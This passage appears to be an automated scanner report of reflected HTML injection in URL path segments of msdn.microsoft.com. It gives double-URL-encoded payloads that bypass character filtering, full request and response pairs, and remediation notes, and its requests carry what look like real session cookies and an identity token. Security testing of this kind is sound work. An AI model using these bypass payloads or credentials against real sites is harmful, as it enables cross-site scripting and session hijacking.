msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:17 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usedda6"><a>6e9b407ad3c/library/dd582939(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0c3e%2522%253e%253ca%253e86fe33f7661 was submitted in the REST URL parameter 2. This input was echoed as a0c3e"><a>86fe33f7661 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya0c3e%2522%253e%253ca%253e86fe33f7661/dd582939(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:33 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya0c3e"><a>86fe33f7661/dd582939(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1089%2522%253e%253ca%253e1aa87e60d4f was submitted in the REST URL parameter 3. This input was echoed as e1089"><a>1aa87e60d4f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582939(office.11e1089%2522%253e%253ca%253e1aa87e60d4f HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11e1089"><a>1aa87e60d4f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80778%2522%253e%253ca%253e591d660c3c3 was submitted in the REST URL parameter 1. This input was echoed as 80778"><a>591d660c3c3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us80778%2522%253e%253ca%253e591d660c3c3/library/dd582939(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:09 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us80778"><a>591d660c3c3/library/dd582939(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a19f7%2522%253e%253ca%253e3cb7c16355f was submitted in the REST URL parameter 2. This input was echoed as a19f7"><a>3cb7c16355f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya19f7%2522%253e%253ca%253e3cb7c16355f/dd582939(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya19f7"><a>3cb7c16355f/dd582939(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecd%2522%253e%253ca%253eadfdc378508 was submitted in the REST URL parameter 3. This input was echoed as ebecd"><a>adfdc378508 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582939(office.11).aspxebecd%2522%253e%253ca%253eadfdc378508 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9231 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11).aspxebecd"><a>adfdc378508" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67864%2522%253e%253ca%253ecad7ddbae4c was submitted in the REST URL parameter 1. This input was echoed as 67864"><a>cad7ddbae4c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us67864%2522%253e%253ca%253ecad7ddbae4c/library/dd582940(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9220 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us67864"><a>cad7ddbae4c/library/dd582940(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6921d%2522%253e%253ca%253e979c28d57ca was submitted in the REST URL parameter 2. This input was echoed as 6921d"><a>979c28d57ca in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6921d%2522%253e%253ca%253e979c28d57ca/dd582940(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
